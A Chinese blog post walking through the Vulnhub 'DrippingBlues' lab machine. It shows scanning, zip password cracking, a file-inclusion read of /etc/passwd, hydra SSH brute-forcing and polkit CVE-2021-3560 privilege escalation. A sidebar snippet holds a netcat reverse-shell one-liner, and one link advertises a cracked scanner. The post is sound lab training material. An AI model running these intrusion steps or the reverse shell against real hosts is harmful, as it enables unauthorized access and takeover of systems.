Vulnhub_drippingblues

最新推荐文章于 2024-01-05 22:22:01 发布
最新推荐文章于 2024-01-05 22:22:01 发布
阅读量1.2k 收藏 1
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/127723843
版权

ff3fd6d10e971a9fa3717e60370415bb.gif

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

Kali:192.168.31.136drippingblues:192.168.31.106

信息收集

1、使用nmap探测发现目标主机仅开放了21、22、80三个端口

nmap -A -p- 192.168.31.106

576bc00b435944c9f05ec34e0f1102a4.png

通过nmap的扫描结果可以看到21端口的ftp有一个匿名登录的漏洞,可以下载到文件respectmydrip.zip,80端口的http服务有一些文件

首先登录ftp下载文件,但是登录下载后发现解压文件需要密码

9df875612d892399cd080430f34bc53e.png

然后我们先访问一下nmap扫出来的robots文件,看到有两个文件

7ba3f6492d81cd2af7ac6762e482b931.png

访问第一个dripisreal.txt发现了一个提示,第二个无法访问,应该需要通过文件包含才能读取

be4d81fbd604c91c809fe5dbf470161e.png

然后我们对网站目录进行扫描发现了index.php,访问后就是80端口的默认页面也没有获取到有价值的信息

dirb http://192.168.31.106/

83a09275b063a0afb43ec9261ffd5209.png

我们再回头尝试破解下下载的压缩文件,得到密码072528035

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
# 参数说明
-D:使用字典
-p:指定使用的字典
-u:只显示破解成功的密码

解压后得到了两个文件

eabf5939bcd14ebf9d8680a372691fd7.png

查看txt文件说让我们把关注点放在drip上,另一个zip文件仍需要密码

3b2674939a1c72e5b866a5b7560cc8ec.png

然后我们尝试在使用drip进行文件包含,发现可以读取文件

http://192.168.31.106/index.php?drip=/etc/passwd

190ee4c8b843182057cf5b557cc4f4e3.png

然后再次尝试读取robots.txt中提示的文件发现有一个密码

939947a3be70ca45291a7a69f1810004.png

用这个密码尝试解密发现失败了

ccd32a432e3e7066b50931402dec1972.png

GETSHELL

然后我们尝试用这个密码登录这台服务器的所有用户,看看是否有用户可以登录成功首先将/etc/passwd保存下来,然后过滤出用户名

cat user1 | awk -F: '{print $1}' >> user

4cae5cb0f9a367b546891008c5e95963.png

然后通过爆破找到了使用这个密码的用户

hydra -L user -p imdrippinbiatch ssh://192.168.31.106

63fdc3207439590e771ff8bc8d417994.png

使用该用户进行登录

68222f57984f04105356901c041c7caf.png

查看家目录下的文件找到第一个flag

239ab721cb259cf187544c94f8bca099.png

提权

执行下面的命令发现了polkit

find / -perm -u=s 2>&1 | grep -v 'Permission denied'

89111ff4c24b40d8c7830b8c94308122.png

然后我们尝试用polkit CVE-2021-3560的本地提权漏洞进行提权,首先把poc下载到靶机

9d37b53bfc461faa7df590e3d42f4985.png

执行脚本后获得root权限

815ca1a49c55f6b3ecad0b94ec18169e.png

最后查看root的flag

45b19c07864510e2410309f6699da37b.png

加入我的星球

da5eec89f68b1382b5514ddde713801c.png

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

fb366133858378190f1569e4fa1bb79a.jpeg

NowSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub-Nagini.txt
06-10
Nagini
vulnhub实战:DRIPPING BLUES 1
huangyongkang666的博客
04-30 2794
vulnhub实战:DRIPPING BLUES: 1 1.安装部署 下载链接: https://download.vulnhub.com/drippingblues/drippingblues.ova 下载之后使用VMware打开.ova文件,打开结果,设置为Net模式 攻击机:kail 2.信息收集 1.扫描此IP段中存活的靶机IP arp-scan -l 找到靶机ip:192.168.241.135 2.端口扫描 nmap -A -p- -T4 192.168.241.135 发现开放了
漏洞利用之FTP漏洞利用
Myu_wzy的博客
09-23 777
一、实验原理 由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器。 二、实验环境 目标主机: Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、匿名用户登录 扫描目标主机21端口:nmap -p 21 192.168.20.143 使用nc 连接ftp:nc 192.168.20.143 21 #密码可以任意输入 ...
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
Vulnhub靶机:drippingblues
最新发布
qq_48904485的博客
01-05 479
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:drippingblues(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dripping-blues-1,744/
drippingblues-靶机渗透
weixin_52111404的博客
08-26 593
渗透,文件包含,使用cve提权,使用正在运行进程的漏洞进行提权
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶场】DRIPPING BLUES: 1
DG_s1mple
01-25 4200
环境准备 下载靶机,导入到vmware里面,这应该不用教了吧 这道题一开始并没有给我们靶机的ip地址,所以我们要自己探测一下,使用命令可以探测IP地址 arp-scan -l 攻击机IP地址为:192.168.2.15 靶机IP地址为:192.168.2.16 渗透开始 首先使用nmap扫描靶机 发现靶机开放了ftp,ssh与web,我们首先试试匿名访问ftp 发现有一个zip文件,我们把它先下载下来,发现需要密码 我们使用工具爆破一下获得了解压密码,打开里面的txt文件发现一串字符串,还有另外
vulnhub | BROKEN-2020: 1
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
09-07 444
文章目录总结前言开始 总结 - 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet - 0.1 查看定时任务 | cat /etc/crontab - 1. python 开启一个http服务器 | python3 -m http.server 8080 - 2. nc 开启监听 | nc -lvp 4444 - 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444 -
vulnhub靶机DriftingBlues: 1渗透笔记
liver100day的博客
07-24 1621
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.4 访问80端口(http服务)1.3 目录爆破2.漏洞利用(暴力破解)3.提权4.总结 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-1,625/ 渗透过程 1.信息收集 1.1 主机发现 首先我们先得获取目标靶机IP,没有IP我们无从开始工作,使用nmap进行扫
VulnHub——DC-5(具体漏洞详解)
高野02blog
12-29 1083
DC-5 这是DC-5的描述,从中得到一些关键信息。 开始 nmap扫描 确定IP地址后端口扫描 发现80端口 使用kali自带工具dirbuster遍历目录 AWVS对网站扫描并没发现重大漏洞 发现只有以下这个界面存在交互 访问footer.php页面时发现了描述中会随着页面刷新改变的东西 我们猜测thankyou.php中incloude()包含了footer.php, 如果是动态包含的路径就可能存在LFI漏洞 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器
2021年1月4日-Vulnhub-DerpNStink渗透学习
AnonyMousIT的博客
01-05 396
2021年1月4日-Vulnhub-DerpNStink渗透学习 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali地址:192.168.31.77 靶机IP地址:192.168.31.31 开放21、22、80端口 访问主页,发现flag1和/webnotes/info.txt路径,老手法了。 更新dns解析,才能访问blog 修改 /etc/hosts 文件 尝试访问robots.txt, 这是每次都不能放过的文件 访问一下
记一次vulnhub|渗透测试 DC-3
crispr的博客
01-17 1603
vulnhub DC-3 0X01 Main Point 1.searchsploit的使用 2.网站指纹识别(Wappalyzer插件) 3.Netcat(反弹shell)初步和下载脚本提权 4.探测Linux内核版本进行攻击得到root权限 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP,使用nmap探测端口开放,只有80端口开放。 先从网站入手看看有...
vulnhub--DriftingBlues: 1
weixin_45922278的博客
03-28 1140
描述 获得标志 难度:容易 关于vm:已测试并从virtualbox导出 目录 1.nmap端口扫描 2.目录扫描 二、漏洞探测&利用 三、getshell & 提权 四、总结 一、信息收集 1.nmap端口扫描 nmap -A -T4 -v -p- 192.168.43.73 2.目录扫描 先将driftingblues.box加入到hosts文件中。 gobuster dir -u http://driftingblues.box...
Vulnhub靶场】DRIPPING BLUES: 1 通关writeup
weixin_44588899的博客
05-17 617
环境 下载地址:https://download.vulnhub.com/drippingblues/drippingblues.ova.torrent 攻击机地址: 192.168.0.106 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.0.104 开始探测 nmap -T4 -p- -A 192.168.0.104 发现开放21、22、80端口,这里发现21可以匿名访问,还可以下载一个压缩包,下载打开需要密码 使用工具爆破密码 fcrackzip -D
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值